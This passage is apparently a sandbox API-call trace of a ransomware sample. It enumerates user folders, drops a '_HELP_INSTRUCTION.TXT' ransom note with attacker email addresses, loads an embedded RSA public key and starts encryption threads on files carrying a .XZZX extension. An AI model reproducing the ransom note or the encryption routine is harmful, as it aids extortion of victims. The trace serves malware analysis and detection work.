lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.915] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.915] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0252.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0252.915] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="Desktop") returned 0x0 [0252.915] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="DESKTOP") returned 0x0 [0252.915] SetErrorMode (uMode=0x1) returned 0x1 [0252.915] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT") returned 58 [0252.915] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.916] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.916] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13f4) returned 0x0 [0252.916] RegQueryValueExW (in: hKey=0x13f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43de250, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43de250*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.916] RegCloseKey (hKey=0x13f4) returned 0x0 [0252.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.916] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13f4 [0252.916] CloseHandle (hObject=0x13f4) returned 1 [0252.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.916] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.916] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0252.916] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0252.916] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0252.916] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.916] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0252.916] SetErrorMode (uMode=0x1) returned 0x1 [0252.916] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0252.917] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0252.917] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0252.917] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0252.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.917] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.917] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0252.917] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0252.917] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="Desktop") returned 0x0 [0252.917] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="DESKTOP") returned 0x0 [0252.917] SetErrorMode (uMode=0x1) returned 0x1 [0252.917] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT") returned 62 [0252.917] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.917] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.917] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13f4) returned 0x0 [0252.917] RegQueryValueExW (in: hKey=0x13f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43de480, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43de480*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.917] RegCloseKey (hKey=0x13f4) returned 0x0 [0252.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.917] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13f4 [0252.918] CloseHandle (hObject=0x13f4) returned 1 [0252.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.918] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.918] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0252.918] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0252.918] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0252.918] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0252.918] SetErrorMode (uMode=0x1) returned 0x1 [0252.918] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0252.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0252.918] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0252.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0252.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.918] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.918] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0252.918] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0252.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="Desktop") returned 0x0 [0252.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="DESKTOP") returned 0x0 [0252.918] SetErrorMode (uMode=0x1) returned 0x1 [0252.918] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT") returned 61 [0252.918] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.919] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.919] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13f4) returned 0x0 [0252.919] RegQueryValueExW (in: hKey=0x13f4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43de6b0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43de6b0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.919] RegCloseKey (hKey=0x13f4) returned 0x0 [0252.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.919] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13f4 [0252.919] CloseHandle (hObject=0x13f4) returned 1 [0252.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0252.919] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0252.919] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0252.919] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0252.919] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0252.919] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0252.919] SetErrorMode (uMode=0x1) returned 0x1 [0252.919] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0252.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0252.919] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0252.919] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0252.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.920] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0252.920] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0252.920] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.920] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="ntldr") returned 0x0 [0252.920] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="NTLDR") returned 0x0 [0252.920] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.920] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.920] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0252.920] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0252.920] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0252.920] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.920] lstrcpyW (in: lpString1=0x17cf1c, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0252.920] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0252.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13f8 [0252.920] Sleep (dwMilliseconds=0x96) [0253.071] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.071] lstrcmpW (lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpString2="..") returned 1 [0253.071] lstrcmpW (lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpString2=".") returned 1 [0253.071] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.071] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="ntldr") returned 0x0 [0253.071] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="NTLDR") returned 0x0 [0253.071] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.071] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.071] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.071] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.071] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0253.071] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0253.071] lstrcpyW (in: lpString1=0x17cf1c, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0253.071] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0253.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13fc [0253.071] Sleep (dwMilliseconds=0x96) [0253.224] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0253.224] lstrcmpW (lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpString2="..") returned 1 [0253.225] lstrcmpW (lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpString2=".") returned 1 [0253.225] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0253.225] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="ntldr") returned 0x0 [0253.225] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="NTLDR") returned 0x0 [0253.225] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0253.225] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="ntdetect.com") returned 0x0 [0253.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="Desktop") returned 0x0 [0253.225] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpSrch="DESKTOP") returned 0x0 [0253.225] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 